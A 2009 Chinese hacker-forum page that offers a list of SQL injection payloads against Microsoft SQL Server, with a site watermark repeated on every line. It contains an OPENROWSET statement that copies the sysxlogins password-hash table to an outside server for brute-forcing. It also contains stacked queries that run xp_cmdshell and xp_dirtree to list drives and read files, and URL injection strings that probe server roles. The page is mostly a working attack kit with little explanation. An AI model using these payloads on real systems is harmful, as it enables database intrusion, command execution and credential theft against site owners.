首页

新闻中心

安全文档

红客学院

下载中心

联盟原创

红盟论坛

珍藏版的SQL旁注精华程序
发表时间:2009-12-13 00:51:10 作者: 来源:红客联盟 收藏本页

珍藏版的SQL旁注精华代码,如下:Sjg中国红客联盟-全球最大的红客组织
以下是引用片段:Sjg中国红客联盟-全球最大的红客组织
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,Sjg中国红客联盟-全球最大的红客组织

1433;’, ’select * from _sysxlogins’) select * from database.dbo.sysxloginsSjg中国红客联盟-全球最大的红客组织
 Sjg中国红客联盟-全球最大的红客组织

Sjg中国红客联盟-全球最大的红客组织
得到hash之后,就可以进行暴力破解。这需要一点运气和大量时间。Sjg中国红客联盟-全球最大的红客组织

遍历目录的方法:Sjg中国红客联盟-全球最大的红客组织
先创建一个临时表:temp Sjg中国红客联盟-全球最大的红客组织

以下是引用片段:Sjg中国红客联盟-全球最大的红客组织
5’;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Sjg中国红客联盟-全球最大的红客组织
5’;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Sjg中国红客联盟-全球最大的红客组织
5’;insert into temp(id) exec master.dbo.xp_subdirs ’c:\’;-- 获得子目录列表 Sjg中国红客联盟-全球最大的红客组织
5’;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:\’;-- 获得所有子目录的目录树结构,并寸入temp表中 Sjg中国红客联盟-全球最大的红客组织
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:\web\index.asp’;-- 查看某个文件的内容 Sjg中国红客联盟-全球最大的红客组织
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’dir c:\’;-- Sjg中国红客联盟-全球最大的红客组织
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’dir c:\ *.asp /s/a’;-- Sjg中国红客联盟-全球最大的红客组织
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc’ Sjg中国红客联盟-全球最大的红客组织
5’;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:\’;-- (xp_dirtree适用权限PUBLIC) Sjg中国红客联盟-全球最大的红客组织

写入表:Sjg中国红客联盟-全球最大的红客组织
以下是引用片段:Sjg中国红客联盟-全球最大的红客组织
语句1:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--  Sjg中国红客联盟-全球最大的红客组织
语句2:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--  Sjg中国红客联盟-全球最大的红客组织
语句3:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--  Sjg中国红客联盟-全球最大的红客组织
语句4:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--  Sjg中国红客联盟-全球最大的红客组织
语句5:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--  Sjg中国红客联盟-全球最大的红客组织
语句6:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--  Sjg中国红客联盟-全球最大的红客组织
语句7:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--  Sjg中国红客联盟-全球最大的红客组织
语句8:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--  Sjg中国红客联盟-全球最大的红客组织
语句9:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER(’db_owner’));--  Sjg中国红客联盟-全球最大的红客组织
把路径写到表中去:Sjg中国红客联盟-全球最大的红客组织
以下是引用片段:Sjg中国红客联盟-全球最大的红客组织
_blank>http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-  Sjg中国红客联盟-全球最大的红客组织
_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert  dirs exec master.dbo.xp_dirtree ’c:\’-  Sjg中国红客联盟-全球最大的红客组织
_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-  Sjg中国红客联盟-全球最大的红客组织
_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in(’@Inetpub’))-  Sjg中国红客联盟-全球最大的红客组织
语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--  Sjg中国红客联盟-全球最大的红客组织
语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ’e:\web’--  Sjg中国红客联盟-全球最大的红客组织
语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-  Sjg中国红客联盟-全球最大的红客组织

上一篇:ZXPortMap 端口映射源代码
下一篇:超简单的后门程序
快速链接
合作伙伴
Discuz官方站岁月联盟中国网管联盟HNC网络联盟交大蓝盾黑客动画吧
河南黑盟中国蓝客联盟绿色兵团溜客安全
友情链接
milw0rm骇安网能邦反病毒华夏黑盟鲁大师数据恢复红盟红色黑客联盟
中国黑客联盟黑蚂蚁安全网编程技术与维护安防快线反病毒小组Tosec安全组3.A.S.T小组
豫ICP备09015648号版权所有© 2001-2009中国红客联盟 All Rights Reserved.